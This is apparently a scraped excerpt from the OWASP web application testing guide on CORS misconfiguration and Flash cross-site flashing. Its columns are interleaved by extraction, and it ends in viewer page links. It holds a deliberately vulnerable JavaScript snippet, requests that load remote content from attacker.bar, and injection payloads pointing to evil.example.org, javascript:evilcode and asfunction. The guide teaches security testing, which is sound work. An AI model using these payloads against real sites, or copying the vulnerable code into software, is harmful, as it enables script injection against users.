1BO4r2U

Recommendations

Info

193 194 Web Application Penetration Testing Web Application Penetration Testing Other headers There are other headers involved like Access-Control-Max-Age that determines the time a preflight request can be cached in the browser, or Access-Control-Expose-Headers that indicates which headers are safe to expose to the API of a CORS API specification, both are response headers specified in the CORS W3C document. Black Box testing Black box testing for finding issues related to Cross Origin Resource Sharing is not usually performed since access to the source code is always available as it needs to be sent to the client to be executed. Gray Box testing Check the HTTP headers in order to understand how CORS is used, in particular we should be very interested in the Origin header to learn which domains are allowed. Also, manual inspection of the JavaScript is needed to determine whether the code is vulnerable to code injection due to improper handling of user supplied input. Below are some examples: Example 1: Insecure response with wildcard ‘*’ in Access-Control-Allow-Origin: Request (note the ‘Origin’ header:) GET http:/attacker.bar/test.php HTTP/1.1 Host: attacker.bar User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http:/example.foo/CORSexample1.html Origin: http:/example.foo Connection: keep-alive Response (note the ‘Access-Control-Allow-Origin’ header:) HTTP/1.1 200 OK Date: Mon, 07 Oct 2013 18:57:53 GMT Server: Apache/2.2.22 (Debian) X-Powered-By: PHP/5.4.4-14+deb7u3 Access-Control-Allow-Origin: * Content-Length: 4 Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Content-Type: application/xml [Response Body] Vulnerable code: var req = new XMLHttpRequest(); req.onreadystatechange = function() { if(req.readyState==4 && req.status==200) { document.getElementById(“div1”).innerHTML=req. responseText; } } var resource = location.hash.substring(1); req.open(“GET”,resource,true); req.send(); For example, a request like this will show the contents of the profile. php file: http:/example.foo/main.php#profile.php Request and response generated by this URL: GET http:/example.foo/profile.php HTTP/1.1 Host: example.foo User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http:/example.foo/main.php Connection: keep-alive HTTP/1.1 200 OK Date: Mon, 07 Oct 2013 18:20:48 GMT Server: Apache/2.2.16 (Debian) X-Powered-By: PHP/5.3.3-7+squeeze17 Vary: Accept-Encoding Content-Length: 25 Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Content-Type: text/html http:/example.foo/main.php#http:/attacker.bar/file.php Request and response generated by this URL: GET http:/attacker.bar/file.php HTTP/1.1 Host: attacker.bar User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http:/example.foo/main.php Origin: http:/example.foo Connection: keep-alive HTTP/1.1 200 OK Date: Mon, 07 Oct 2013 19:00:32 GMT Server: Apache/2.2.22 (Debian) X-Powered-By: PHP/5.4.4-14+deb7u3 Access-Control-Allow-Origin: * Vary: Accept-Encoding Content-Length: 92 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html Injected Content from attacker.bar Injected Content from attacker.bar Tools • OWASP Zed Attack Proxy (ZAP) - https://www.owasp.org/index. php/OWASP_Zed_Attack_Proxy_Project References OWASP Resources • OWASP HTML5 Security Cheat Sheet: https://www.owasp.org/ index.php/HTML5_Security_Cheat_Sheet Whitepapers • W3C - CORS W3C Specification: http://www.w3.org/TR/cors/ Testing for Cross site flashing (OTG-CLIENT-008) Summary ActionScript is the language, based on ECMAScript, used by Flash applications when dealing with interactive needs. There are three versions of the ActionScript language. ActionScript 1.0 and Action- Script 2.0 are very similar with ActionScript 2.0 being an extension of ActionScript 1.0. ActionScript 3.0, introduced with Flash Player 9, is a rewrite of the language to support object orientated design. ActionScript, like every other language, has some implementation patterns which could lead to security issues. In particular, since Flash applications are often embedded in browsers, vulnerabilities like DOM based Cross-Site Scripting (XSS) could be present in flawed Flash applications. How to Test Since the first publication of “Testing Flash Applications” [1], new versions of Flash player were released in order to mitigate some of the attacks which will be described. Nevertheless, some issues still remain exploitable because they are the result of insecure programming practices. Decompilation Since SWF files are interpreted by a virtual machine embedded in the player itself, they can be potentially decompiled and analysed. The most known and free ActionScript 2.0 decompiler is flare. To decompile a SWF file with flare just type: $ flare hello.swf it will result in a new file called hello.flr. Decompilation helps testers because it allows for source code assisted, or white-box, testing of the Flash applications. HP’s free SWFScan tool can decompile both ActionScript 2.0 and ActionScript 3.0 SWFScan The OWASP Flash Security Project maintains a list of current disassemblers, decompilers and other Adobe Flash related testing tools. Undefined Variables FlashVars FlashVars are the variables that the SWF developer planned on receiving from the web page. FlashVars are typically passed in from the Object or Embed tag within the HTML. For instance: Example 2: Input validation issue, XSS with CORS: This code makes a request to the resource passed after the # character in the URL, initially used to get resources in the same server. [Response Body] Now, as there is no URL validation we can inject a remote script, that will be injected and executed in the context of the example.foo domain, with a URL like this: ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
195 196 Web Application Penetration Testing Web Application Penetration Testing cabs/flash/swflash.cab#version=9,0,124,0”> FlashVars can also be initialized from the URL: http:/www.example.org/somefilename.swf?var1=val1&- var2=val2 text; while (v2 < v3.length) { Locale.strings[v3[v2]._resname] = v3[v2].source.__ ++v2; } on_load(); } else {} }; if (_root.language != undefined) { Locale.DEFAULT_LANG = _root.language; } v5.load(Locale.DEFAULT_LANG + ‘/player_’ + Locale.DEFAULT_LANG + ‘.xml’); }; This is because in this situation the browser will self-generate an HTML page as if it were hosted by the victim host. XSS GetURL (AS2) / NavigateToURL (AS3): The GetURL function in ActionScript 2.0 and NavigateToURL in ActionScript 3.0 lets the movie load a URI into the browser’s window. So if an undefined variable is used as the first argument for getURL: getURL(_root.URI,’_targetFrame’); Or if a FlashVar is used as the parameter that is passed to a navigateToURL function: ExternalInterface: ExternalInterface.call is a static method introduced by Adobe to improve player/browser interaction for both ActionScript 2.0 and ActionScript 3.0. From a security point of view it could be abused when part of its argument could be controlled: flash.external.ExternalInterface.call(_root.callback); the attack pattern for this kind of flaw should be something like the following: eval(evilcode) In ActionScript 3.0, a developer must explicitly assign the FlashVar values to local variables. Typically, this looks like: var paramObj:Object = LoaderInfo(this.root.loaderInfo).parameters; var var1:String = String(paramObj[“var1”]); var var2:String = String(paramObj[“var2”]); In ActionScript 2.0, any uninitialized global variable is assumed to be a FlashVar. Global variables are those variables that are prepended by _root, _global or _level0. This means that if an attribute like: The above code could be attacked by requesting: http:/victim/file.swf?language=http:/evil.example.org/malicious.xml? Unsafe Methods When an entry point is identified, the data it represents could be used by unsafe methods. If the data is not filtered/validated using the right regexp it could lead to some security issue. Unsafe Methods since version r47 are: var request:URLRequest = new URLRequest(FlashVarSuppliedURL); navigateToURL(request); Then this will mean it’s possible to call JavaScript in the same domain where the movie is hosted by requesting: http:/victim/file.swf?URI=javascript:evilcode getURL(‘javascript:evilcode’,’_self’); since the internal JavaScript which is executed by the browser will be something similar to: eval(‘try { __flash__toXML(‘+__root.callback+’) ; } catch (e) { “”; }’) HTML Injection TextField Objects can render minimal HTML by setting: tf.html = true tf.htmlText = ‘text’ _root.varname is undefined throughout the code flow, it could be overwritten by setting http:/victim/file.swf?varname=value Regardless of whether you are looking at ActionScript 2.0 or Action- Script 3.0, FlashVars can be a vector of attack. Let’s look at some ActionScript 2.0 code that is vulnerable: Example: movieClip 328 __Packages.Locale { loadVariables() loadMovie() getURL() loadMovie() loadMovieNum() FScrollPane.loadScrollContent() LoadVars.load LoadVars.send XML.load ( ‘url’ ) LoadVars.load ( ‘url’ ) Sound.loadSound( ‘url’ , isStreaming ); NetStream.play( ‘url’ ); flash.external.ExternalInterface.call(_root.callback) htmlText The same when only some part of getURL is controlled: Dom Injection with Flash JavaScript injection getUrl(‘javascript:function(‘+_root.arg+’)) asfunction: You can use the special asfunction protocol to cause the link to execute an ActionScript function in a SWF file instead of opening a URL. Until release Flash Player 9 r48 asfunction could be used on every method which has a URL as an argument. After that release, asfunction was restricted to use within an HTML TextField. This means that a tester could try to inject: asfunction:getURL,javascript:evilcode So if some part of text could be controlled by the tester, an A tag or an IMG tag could be injected resulting in modifying the GUI or XSS the browser. Some attack examples with A Tag: • Direct XSS: • Call a function: • Call SWF public functions: • Call native static as function: #initclip if (!_global.Locale) { var v1 = function (on_load) { var v5 = new XML(); var v6 = this; v5.onLoad = function (success) { if (success) { trace(‘Locale loaded xml’); var v3 = this.xliff.file.body.$trans_unit; var v2 = 0; The Test In order to exploit a vulnerability, the swf file should be hosted on the victim’s host, and the techniques of reflected XSS must be used. That is forcing the browser to load a pure swf file directly in the location bar (by redirection or social engineering) or by loading it through an iframe from an evil page: in every unsafe method like: loadMovie(_root.URL) by requesting: http:/victim/file.swf?URL=asfunction:getURL,javascript:evilcode IMG tag could be used as well: (.swf is necessary to bypass flash player internal filter) Note: since release Flash Player 9.0.124.0 of Flash player XSS is no longer exploitable, but GUI modification could still be accomplished.
Page 1 and 2:
1 2 THE ICONS BELOW REPRESENT WHAT
Page 3 and 4:
3 4 Testing Guide Frontispiece Test
Page 5 and 6:
7 8 Testing Guide Introduction Test
Page 7 and 8:
11 12 Testing Guide Introduction Te
Page 9 and 10:
15 16 Testing Guide Introduction Te
Page 11 and 12:
19 20 Testing Guide Introduction of
Page 13 and 14:
23 24 Web Application Penetration T
Page 15 and 16:
Page 17 and 18:
Page 19 and 20:
Page 21 and 22:
Page 23 and 24:
Page 25 and 26:
Page 27 and 28:
Page 29 and 30:
Page 31 and 32:
Page 33 and 34:
Page 35 and 36:
Page 37 and 38:
Page 39 and 40:
Page 41 and 42:
Page 43 and 44:
Page 45 and 46:
Page 47 and 48: 91 92 Web Application Penetration T
Page 49 and 50: 95 96 Web Application Penetration T
Page 51 and 52: 99 100 Web Application Penetration
Page 97: 191 192 Web Application Penetration
Page 107 and 108: 211 212 Reporting Appendix Test ID
Page 109 and 110: 215 216 Appendix Appendix Testing -
Page 111: 219 220 LDAP Injection For details
show all

1BO4r2U

Create successful ePaper yourself

Delete template?

Save as template?